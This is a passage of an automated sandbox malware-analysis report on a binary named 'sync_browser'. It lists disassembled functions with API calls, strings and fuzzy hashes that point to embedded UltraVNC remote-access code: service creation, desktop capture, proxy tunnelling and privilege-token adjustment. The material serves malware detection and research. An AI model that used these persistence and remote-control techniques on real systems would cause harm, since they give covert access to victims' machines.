                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$EnterInvalidateRect
                                                                                          • String ID: Default$O$vncdesktop.cpp : Closing pending driver driver version$vncdesktop.cpp : Driver Used$vncdesktop.cpp : Driver option is enabled$vncdesktop.cpp : Shared memory mapped$vncdesktop.cpp : Start Mirror driver$vncdesktop.cpp : Start Mirror driver Failed$vncdesktop.cpp : Using non driver mode
                                                                                          • API String ID: 3829719269-2763606790
                                                                                          • Opcode ID: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
                                                                                          • Instruction ID: 8e9e8507278b95c38ec7d45f8b718b8b2a96765490f3da6218dbfb8e1289dc00
                                                                                          • Opcode Fuzzy Hash: 652b5f9046d9b24421932a7dd2b51d09f8589ab305cb01d8b65987974c3b0a0b
                                                                                          • Instruction Fuzzy Hash: 73718E37A28A8285E744CF25D4446EC77B4FBA8F48F484536EA5D9B3A9CF3C9449CB10
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF67E7D2FE0: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D3009
                                                                                            • Part of subcall function 00007FF67E7D2FE0: SetCurrentDirectoryA.KERNEL32 ref: 00007FF67E7D3041
                                                                                          • OpenSCManagerA.ADVAPI32 ref: 00007FF67E7D2D23
                                                                                          • CreateServiceA.ADVAPI32 ref: 00007FF67E7D2DB6
                                                                                          • GetLastError.KERNEL32 ref: 00007FF67E7D2DC4
                                                                                          • CloseServiceHandle.ADVAPI32 ref: 00007FF67E7D2DFB
                                                                                            • Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
                                                                                            • Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
                                                                                            • Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
                                                                                            • Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
                                                                                            • Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
                                                                                            • Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
                                                                                            • Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$Thread$CloseCurrentOpenService$CreateDirectoryErrorFileHandleInputLastManagerMessageModuleName
                                                                                          • String ID: Failed to create a new service$Failed to open service control manager$Failed: Permission denied$Tcpip$UltraVNC$uvnc_service
                                                                                          • API String ID: 1695331641-1004021400
                                                                                          • Opcode ID: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                                          • Instruction ID: 525f3c090ca9f1fa3f80bdad4abf5c565f909c9da2b87864617a9b6e5e4ec109
                                                                                          • Opcode Fuzzy Hash: 6415f80341d9534cb3fadac7f1d9968ed7ad466c8fff1878714631192f384662
                                                                                          • Instruction Fuzzy Hash: 92315E36A28A8282EB11DB14F8542B9B3A4FF68754F540035E98EC2664EF7DE59EC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressCreateDeleteDisplayEnumErrorFreeLastLoadProcSettings
                                                                                          • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                                          • API String ID: 1846935786-1174184736
                                                                                          • Opcode ID: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                                          • Instruction ID: 03061c382011a2ed00193aa24bc06d1a726bbe5a10c2baa5cfd7c43bbf644e67
                                                                                          • Opcode Fuzzy Hash: 90704b8816186510b2b91f08dfa5c235d54b69d90b2a5e6b12a0bf26ce9b4dd4
                                                                                          • Instruction Fuzzy Hash: 9A314F26B29A8295FB70DF25B8547AAA3A4FFA9744F940135EA4E87694DF3CD00DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: rand$Time_getptd$FileSystem
                                                                                          • String ID: After DH: g=%I64u, m=%I64u, i=%I64u, key=%I64u$CheckUserGroupPasswordUni result=%i$interKey larger than maxNum
                                                                                          • API String ID: 3485648590-3000200491
                                                                                          • Opcode ID: 1100013eedf7ebce8c619a49799bc30268fb9fae8f8c59135d25ae767e08c8be
                                                                                          • Instruction ID: 4453ab6936f9dfb29db253d49b92711672b5d84bbe7c5dd7dec07d1fa28c070c
                                                                                          • Opcode Fuzzy Hash: 1100013eedf7ebce8c619a49799bc30268fb9fae8f8c59135d25ae767e08c8be
                                                                                          • Instruction Fuzzy Hash: 5DF11953B297D54AEB00C7B9A4102FC7FA09B92785F544076EF9D6BB9ADD2CD104C710
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: recv$send
                                                                                          • String ID: CONNECT %s:%d HTTP/1.0$Location: $Proxy-Authenticate:$WWW-Authenticate:$basic
                                                                                          • API String ID: 1963230611-4083095726
                                                                                          • Opcode ID: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                                          • Instruction ID: 4d44eba54a25952f4e588ad45c325b5eada7518922650bd31975fc54866f7b3c
                                                                                          • Opcode Fuzzy Hash: d657ed37a6cae802db04decd52c8b9e56745bb5c9d23933e6423cb635756a354
                                                                                          • Instruction Fuzzy Hash: 8EF1C523B2CB8641F7609B25E540279A79DEBA5794F542231FA4DD3AE5EF3CE50AC300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                          • API String ID: 2183313154-4022980321
                                                                                          • Opcode ID: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                                          • Instruction ID: fe5bca8a16b039ecc3fc7c4196628f3a0c0d46822c698b1d0032745c24e076cf
                                                                                          • Opcode Fuzzy Hash: cf5eef92c392be2f681cf437b81623491fac9973547c1d005ab3661ee4ff1334
                                                                                          • Instruction Fuzzy Hash: F351D123B3868285FB24D725A8116BAA395FFA5784F444235FE5D83B96DF3CE509C204
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressCreateDisplayEnumFreeLoadProcSettings
                                                                                          • String ID: DISPLAY$EnumDisplayDevicesA$USER32$mv video hook driver2
                                                                                          • API String ID: 3702840025-1174184736
                                                                                          • Opcode ID: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                                          • Instruction ID: 2240407e9fc4df3f79e2642fca7153b67ac15beb2d97080478fed251adb49b77
                                                                                          • Opcode Fuzzy Hash: d748da3611d51f35711ae867021bc229038fb3513b14e4069d6ed17d8080ad48
                                                                                          • Instruction Fuzzy Hash: 9D31A326B2968295F770CB25F8547AAA3A4FBD9744F840135EE8E87B84EF3CD109C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentErrorLastLookupPrivilegePrivilegesValue
                                                                                          • String ID: SeTcbPrivilege
                                                                                          • API String ID: 2450735924-1502394177
                                                                                          • Opcode ID: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                                          • Instruction ID: 88bac2945662a197f63a0cab317ce291374ca8f0fafa4818e34aff279a31304a
                                                                                          • Opcode Fuzzy Hash: 049707e4f3f4a22454709a7697195c91078346b3f6d7fa6eb6f95c633ec379e6
                                                                                          • Instruction Fuzzy Hash: 93215E62F28B4282FB50DF65E8051AAA3A4FFA9B54F440035FA4E86754EF7DD058CB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                                                                          • String ID:
                                                                                          • API String ID: 2532449802-0
                                                                                          • Opcode ID: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                                          • Instruction ID: b2530087fcea9ac84bfff70d255300bc339720092c1549478c37aaf48834c152
                                                                                          • Opcode Fuzzy Hash: 8dacce8ed05afb912c218c2bfa4b7955afc0b41eb5700f84e9d69f6c384d718a
                                                                                          • Instruction Fuzzy Hash: AAC19133B3828289E724DF65A54177AB795BFA5740F40413AFA8DC36A6DF3CE4198700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 1457502553-0
                                                                                          • Opcode ID: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                                          • Instruction ID: e77412ffff92e026ae6deaba0f9a87f576e61e80e9892330ca95c337226eb174
                                                                                          • Opcode Fuzzy Hash: cbc433eb692454e3aa796801b86b425fca8be06b4507e2d40963ba8697586f4d
                                                                                          • Instruction Fuzzy Hash: 4591C673B347464BFB689F25C9517A9A2D5EB64788F048035FE0DCAB9AEE3CE5048700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressInfoProcSystem$Version
                                                                                          • String ID: @$GetNativeSystemInfo$GetVersionExA
                                                                                          • API String ID: 4103462327-1183986914
                                                                                          • Opcode ID: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                                          • Instruction ID: 70249d40aacc4f818e30fa9811248f2ce9dc1dc4da3aafa9e4951566403c973e
                                                                                          • Opcode Fuzzy Hash: c077f823e49ebc5b331189c8cff37ce902c5a9973228b6b7ea9e339cd8702d33
                                                                                          • Instruction Fuzzy Hash: CBF16E73A286818AE750CF75D0803BD77A9FB65B48F188135EA4D8A2A9DF3CD549CB10
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Desktop$CloseCountCriticalInputLeaveOpenSectionTick
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 429868813-3977938048
                                                                                          • Opcode ID: e9e62cd296078c53cb1cec29766dcffb447fb13737ad5941dcee0614298be037
                                                                                          • Instruction ID: 985dbab6d54e08ef085167f0a78845f392dc25cd87af7ea2ec91ea61baba09f6
                                                                                          • Opcode Fuzzy Hash: e9e62cd296078c53cb1cec29766dcffb447fb13737ad5941dcee0614298be037
                                                                                          • Instruction Fuzzy Hash: 5CC1E333A28A9181F750CB25C4597FE2BA5EBA5B84F194135EA4CCB7A5DF3CD849C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
